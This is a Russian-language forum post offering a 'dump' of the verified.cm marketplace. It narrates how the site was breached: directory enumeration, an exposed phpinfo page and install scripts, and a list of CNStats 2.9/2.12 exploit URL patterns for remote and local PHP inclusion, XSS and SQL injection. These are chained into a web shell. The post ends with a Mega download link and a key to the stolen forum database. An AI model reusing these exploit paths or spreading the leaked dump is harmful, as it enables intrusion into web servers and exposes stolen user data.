скачать Дамп Verified.cm

Тема в разделе "Программы, скрипты, рипы", создана пользователем slito.info, 13 сен 2018.

  1. slito.info

    slito.info Administrator

    17.744
    121
    48
    Обычно мы занимаемся более серьезным аудитом, на нашем опыте такие ресурсы как bankofamerica.com, bbc.co.uk, но ни так давно решили разобратся а что же собственно творится в нашем родном андерграунде, взгляд пал на не мало известную торговую площадку verified.

    Easy Hack
    Сбор сведений о системе решено было начать с анализа директорий тк основной ip сервера был за cloudFlare.
    Инструменты: DirBuster
    Первое что бросилось в глаз:
    https://verified.cm/file/
    https://verified.cm/tmp/
    https://verified.cm/img/
    https://verified.cm/attachments/
    https://verified.cm/vb2/

    Бл*ть ну кто же так выставляет права на директории!!!
    https://verified.cm/pgg.php - phpinfo();
    А вот и phpinfo.
    https://verified.cm/des/ немного дизайна)))
    https://verified.cm/checksums.md5
    https://verified.cm/file_id.diz
    https://verified.cm/firmament/ - мне одному кажется что фирма мент?!))
    No Comments.

    Папку с установочным скриптом гениально было перееиминовать с install в ins :
    https://verified.cm/ins/finalupgrade.php
    https://verified.cm/ins/upgrade.php
    https://verified.cm/ins/install.php

    Вектор атаки
    https://verified.cm/cns/ и https://verified.cm/cns/_install/
    Ребята жестко мониторят траф!!! При том система мониторинга позволяет ослеживать ваше местонахождение крайне детально!!!
    Это их и сгубило!

    Код: PHP-инклудинг в CNStats CNStats 2.12 и 2.9, возможно более ранние версии. Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "bj" (версия 2.9) и в параметре "bn" (версия 2.12) в сценариях who_r.php и who_s.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости в версии 2.12 опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример: http://[host]/reports/who_r.php?bj=[file] /reports/who_c.php?bo Локал-инклуд: если magic_quotes_off, просмотр статистики без пароля: /export/exp_n_print.php?st=[PHPinc] XSS: /reports/help.php?from=[XSS] SQL Иньекция - версии 2.12: /reports/ipinfo.php?rid=[SQL] Если есть возможность залить файл в /lang/ то можно и его инклюдить через:
    js.php?language=[INC]
    По итогу magic_quotes_off! и у нас есть Локал-инклуд + phpinfo + полный путь до сервера, что равняется web-shell.

    Собственно дамп форума.
    https://mega.co.nz/#!bEEVxaiL!c7WasS4yClutUM2DyUg5i2XL-lsqsUEg5jxyoNAvPfw
    izaqu9itoaXiR6Mohf3V